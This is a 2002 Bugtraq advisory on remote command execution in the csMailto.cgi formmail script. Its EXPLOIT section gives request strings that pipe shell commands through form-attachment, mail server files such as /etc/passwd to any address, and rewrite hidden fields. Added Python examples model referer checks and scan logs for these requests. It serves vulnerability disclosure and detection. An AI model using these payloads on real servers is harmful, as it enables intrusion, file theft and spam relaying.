From: Steve Gustin <stegus1@yahoo.com>
To: bugtraq@securityfocus.com
Subject: CGIscript.net - csMailto.cgi - Remote Command Execution
Date: Tue, 23 Apr 2002 13:02:17 -0700 (PDT)

CGIscript.net - csMailto.cgi - Remote Command Execution
---------------------------------------------------------------------

Name      : CGIscript.net - csMailto.cgi - Remote Command Execution
Date      : April 23, 2002
Product   : csMailto
Vuln Type : Access Validation Error
Severity  : HIGH RISK
Vendor    : WWW.CGIscript.NET, LLC.
Homepage  : http://www.cgiscript.net/

DISCUSSION:
---------------------------------------------------------------------

csMailto is a Perl CGI formmail script developed by Mike Barone and Andy Angrick of CGIscript.net. From the website: "(csMailto is) an automated script that allows the user to build and manage multiple mailto forms to use within your web site. Build your own mailto forms without having to learn Perl. It also can send and receive files!"

The script stores all its configuration data in hidden form fields, relying on the user to accurately (and honestly) echo that information back with each form submission. The only thing preventing a user from having complete control over the script is a referer check, which is easily bypassed. Because of this and other problems, the script is subject to the following attacks:

- execute commands on the server
- execute a command on the server and mail the output to anyone
- email server files to anyone
- download logged form input (in CSV format)
- use the form to send email to anyone

EXPLOIT:
---------------------------------------------------------------------

Because the script stores all the form configuration data in hidden fields in the actual form, once a user can bypass the referer check they can essentially do anything an administrator of the program could do, plus some additional things that probably weren't intended.
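The referer check described in the next paragraph (the server hostname anywhere in the header) modelled in Python beside a component-wise URL comparison, as an added example that is not csMailto's own code; SERVER_HOST, FORM_URL and the Referer values are constructed from the bypass cases the advisory lists.

```python
"""Referer checks: the hostname-substring test csMailto relies on vs. a
component-wise URL comparison. Added example, not csMailto's own code;
SERVER_HOST, FORM_URL and the Referer values are constructed."""
from urllib.parse import urlsplit

SERVER_HOST = "host.com"                          # constructed
FORM_URL = "http://host.com/forms/contact.html"   # constructed

def weak_referer_ok(referer: str) -> bool:
    """The check described in the advisory: is the hostname anywhere in the header?"""
    return SERVER_HOST in referer

def strict_referer_ok(referer: str) -> bool:
    """Parse the header and require scheme, host and path to equal the form page."""
    if not referer:
        return False
    r, f = urlsplit(referer), urlsplit(FORM_URL)
    return (r.scheme, r.hostname, r.path) == (f.scheme, f.hostname, f.path)

# Referer values a browser would send for the bypasses listed in the advisory
# (constructed; file:// paths stand in for the C:\html\... examples).
CASES = {
    "genuine form submission": "http://host.com/forms/contact.html",
    "local form, host in path": "file:///C:/html/host.com/form.html",
    "local link page, host in name": "file:///C:/html/host.com.html",
    "header forged by an LWP script": "http://host.com/forms/contact.html",
}

def evaluate() -> dict:
    """Map each case to (weak_check_passes, strict_check_passes)."""
    return {name: (weak_referer_ok(ref), strict_referer_ok(ref))
            for name, ref in CASES.items()}

if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name:32} weak={weak!s:5} strict={strict}")
```

The forged header passes both checks: the Referer is supplied by the client, so no test on it can protect configuration that the client itself echoes back, which is the root problem the advisory describes.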
The script doesn't even check for the full referer; it only checks for the presence of the server hostname in the referer you send. For example, if the script is http://host.com/cgi-script/CSMailto/CSMailto.cgi then it will look for "host.com" in the referer. This method is inherently insecure and can be bypassed by:

- Creating a Perl LWP script which can specify an arbitrary referer.
- Using JavaScript or other means to modify the form values on the generated CSMailto form and letting the browser send the original (and valid) URL as the referer.
- Creating a local form page with the target hostname in the path, and thus in the referer that is sent when the form is submitted (eg: C:\html\host.com\form.html).
- Creating a local HTML page with a simple link (see below) and the target hostname in the path, and thus in the referer that is sent when the link is clicked (eg: C:\html\host.com.html).

Some example exploits are as follows. Note, these all assume that the referer check was bypassed with one of the above methods.

- execute commands on the server

  CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

- execute a command on the server and mail the output to anyone

  CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform

- email a server file to anyone

  CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform

- download/access form input (no referer check)

  CSMailto has the option to "have the feedback exported to an external file". These files are stored in CSV format and can be downloaded from:

  CSMailto/export/FORM_NAME.csv

  Form HTML files are often named after their form names, and the form name is also stored in hidden fields in the actual form like so: "...formname=FORM_NAME...". Also, it's worth noting that the script doesn't properly escape '"', ',', or newline ("\n") chars, so any CSV data containing those characters may get corrupted.
- use the form to send email to anyone

  CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&form-results=body&command=mailform

Another example of the seriousness of this problem: as mentioned above, you can simply load an existing CSMailto form, have your browser (IE in this example) change some of the preset hidden form values, and then click submit.

Example:

- email a server file to anyone

  javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
  javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
  javascript:alert(document.forms[0]["Email"].value="user@host.com");

IMPACT:
---------------------------------------------------------------------

Because of the high number of users of CGIscript.net scripts (over 17,000 csSearch users alone, according to the website) and the fact that search engines can easily be used to identify sites with the unique "csMailto.cgi" script name, the risk posed by these flaws is very high indeed.

SOLUTION
---------------------------------------------------------------------

The vendor was notified of the problem on Apr 5, 2002 but has not yet released a fix. Affected parties may want to consider switching to a free replacement such as "nms formmail", which can be found at http://nms-cgi.sourceforge.net/scripts.shtml

VENDOR HISTORY:
---------------------------------------------------------------------

April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi, csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432

March 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169

DISCLAIMER
---------------------------------------------------------------------

The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lies within the user's responsibility.

FEEDBACK:
---------------------------------------------------------------------

If anyone has any other CGIscript.net scripts they'd like me to take a look at, just drop me a line at stegus1@yahoo.com.
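Detection logic for the request patterns listed in the EXPLOIT section, run over web-server access logs, as an added example that is not part of the advisory; the log lines are constructed (combined log format) and the finding names are my own.

```python
"""Scan access logs for the csMailto.cgi request patterns listed in the EXPLOIT
section. Added example, not part of the advisory; the log lines are
constructed (combined log format) and the finding names are my own."""
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def classify(url: str) -> list:
    """Return findings for one request URL; empty list when nothing matches."""
    parts = urlsplit(url)
    path = parts.path.lower()
    if not path.endswith("csmailto.cgi"):
        # exported feedback is fetched as a static file, never touching the script
        return ["csv-export-download"] if re.search(r"/csmailto/export/[^/]+\.csv$", path) else []
    qs = parse_qs(parts.query, keep_blank_values=True)   # %-decodes the values
    attachment = qs.get("form-attachment", [""])[0]
    findings = []
    if "|" in attachment:                     # trailing pipe: value reaches a shell
        findings.append("command-injection")
    if attachment.startswith("/") or ".." in attachment \
            or re.match(r"[A-Za-z]:[\\/]", attachment):  # absolute/traversing path
        findings.append("file-exfiltration")
    if attachment and "Email" in qs \
            and qs.get("form-autoresponse", [""])[0].upper() == "YES":
        findings.append("output-mailed-to-supplied-address")
    return findings

def scan(lines) -> list:
    """Return (client_ip, url, findings) for every log line that has findings."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := classify(m.group("url"))):
            hits.append((m.group("ip"), m.group("url"), findings))
    return hits

# Constructed sample. The POST line cannot be judged from the access log because
# the form parameters travel in the request body, so it produces no finding.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Apr/2002:13:02:17 -0700] "GET /cgi-bin/CSMailto/CSMailto.cgi'
    '?form-attachment=SHELL_COMMANDS_HERE%7C&command=mailform HTTP/1.0" 200 512',
    '203.0.113.5 - - [23/Apr/2002:13:03:01 -0700] "GET /cgi-bin/CSMailto/CSMailto.cgi'
    '?form-attachment=/etc/passwd&Email=x%40example.org&form-autoresponse=YES'
    '&command=mailform HTTP/1.0" 200 512',
    '198.51.100.7 - - [23/Apr/2002:13:04:44 -0700] "GET /cgi-bin/CSMailto/export/contact.csv HTTP/1.0" 200 4096',
    '192.0.2.9 - - [23/Apr/2002:13:05:10 -0700] "POST /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0" 200 512',
]
```

Because legitimate submissions and abusive ones alike arrive as POSTs whose fields are not logged, this only catches the GET form of the requests shown above; for full coverage the parameters have to be checked inside the CGI itself or by a request-body-aware filter.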